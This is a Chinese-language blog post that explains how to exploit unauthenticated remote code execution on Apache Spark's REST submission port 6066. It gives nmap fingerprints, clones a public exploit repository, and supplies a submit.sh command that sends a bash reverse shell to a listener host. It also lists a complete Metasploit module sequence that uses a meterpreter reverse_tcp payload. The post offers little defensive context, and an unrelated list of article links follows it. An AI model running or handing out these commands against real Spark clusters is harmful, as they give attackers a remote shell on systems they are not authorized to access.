spark未授權RCE漏洞

原創 斑林鴿的代碼世界 2021-04-22 12:59

Spark簡介

spark是一個實現快速通用的集羣計算平臺。它是由加州大學伯克利分校AMP實驗室 開發的通用內存並行計算框架,用來構建大型的、低延遲的數據分析應用程序。它擴展了廣泛使用的MapReduce計算模型。高效的支撐更多計算模式,包括交互式查詢和流處理。spark的一個主要特點是能夠在內存中進行計算,及時依賴磁盤進行復雜的運算,Spark依然比MapReduce更加高效。

Spark未授權

信息探測

nmap掃描出先如下端口開放,則很有可能

6066/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8081/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8082/tcp  open  http           Jetty 9.3.z-SNAPSHOT

驗證如圖

下載攻擊組件或使用MSF

下載地址:git clone https://github.com/aRe00t/rce-over-spark.git

jar工具使用說明

./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"

反彈shell效果:

msf工具

msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

微服務實踐Aspire項目發佈到遠程k8s集羣

前提 你必須會創建aspire項目,不會的請先看微服務新體驗之Aspire初體驗 Aspirate (Aspir8) Aspirate 是將aspire項目發佈到k8s集羣的工具 安裝aspirate dotnet tool install

hiningrise 2024-06-02 14:24:56

微服務實踐之使用 Visual Studio 2022 調試Dapr 應用程序

安裝配置相關軟件 安裝 PowerShell 7 / Core dotnet tool install --global PowerShell 安裝 Visual Studio 擴展 Microsoft Child Process Deb

hiningrise 2024-06-02 14:24:56

.NET開源、跨平臺、使用簡單的面部識別庫

前言 今天給大家分享一個.NET開源(MIT License)、免費、跨平臺(適用於 Windows、MacOS 和 Linux )、使用簡單的面部識別庫:FaceRecognitionDotNet。 項目介紹 FaceRecogniti

追逐時光 2024-06-02 14:21:55

Python 潮流週刊#53:我輩楷模,一個約見諾獎得主,一個成爲核心開發者

本週刊由 Python貓 出品,精心篩選國內外的 250+ 信息源,爲你挑選最值得分享的文章、教程、開源項目、軟件工具、播客和視頻、熱門話題等內容。願景:幫助所有讀者精進 Python 技術,並增長職業和副業的收入。 本期週刊分享了 12

豌豆花下貓 2024-06-02 14:19:15

Terraform管理OpenStack

    官方安裝指南 https://developer.hashicorp.com/terraform/install https://developer.hashicorp.com/terraform/intro/getting-sta

馬昌偉 2024-06-02 14:13:44

matlab練習程序(LQR路徑跟蹤)

LQR 是一種優化控制方法,設計目標是找到一組控制輸入,使得線性系統的狀態軌跡儘可能地接近目標,同時使控制輸入儘可能小。其目標函數是一個二次型成本函數。 分爲以下幾個步驟: 1. 設系統動態方程爲: 其中x爲狀態量,u爲控制輸入,A和B爲

Dsp Tian 2024-06-02 14:11:04

h32 Most commonly used tags in HTML

  Most commonly used tags in HTML Last Updated : 08 Mar, 2024   Most commonly used tags in HTML refer to HTM

emanlee 2024-06-02 14:10:23

css45 CSS Math Functions

https://www.w3schools.com/css/css_math_functions.asp   The CSS math functions allow mathematical expressions to be used

emanlee 2024-06-02 14:10:23

CSS tutorials (w3school)

CSS tutorials (w3school) https://www.schoolsw3.com/css/index.php  (Русский язык) https://www.w3schools.com/css/css_intro

emanlee 2024-06-02 14:10:23

css44 CSS The !important Rule

https://www.w3schools.com/css/css_important.asp   What is !important? The !important rule in CSS is used to add more imp

emanlee 2024-06-02 14:10:23

css41 CSS Website Layout

https://www.w3schools.com/css/css_website_layout.asp   Website Layout A website is often divided into headers, menus, co

emanlee 2024-06-02 14:10:23

css39 CSS Forms

https://www.w3schools.com/css/css_form.asp The look of an HTML form can be greatly improved with CSS: <!DOCTYPE html>

emanlee 2024-06-02 14:10:23

css40 CSS Counters

https://www.w3schools.com/css/css_counters.asp   CSS counters are "variables" maintained by CSS whose values can be inc

emanlee 2024-06-02 14:10:23

css43 CSS Specificity

https://zhuanlan.zhihu.com/p/670589063 CSS Specificity(CSS 特異性)是一個用來決定當多個CSS規則應用於同一個元素時,哪個規則將優先應用的機制。   What is Specific

emanlee 2024-06-02 14:10:23

css42 CSS Units

https://www.w3schools.com/css/css_units.asp   CSS Units CSS has several different units for expressing a length. Many CS

emanlee 2024-06-02 14:10:23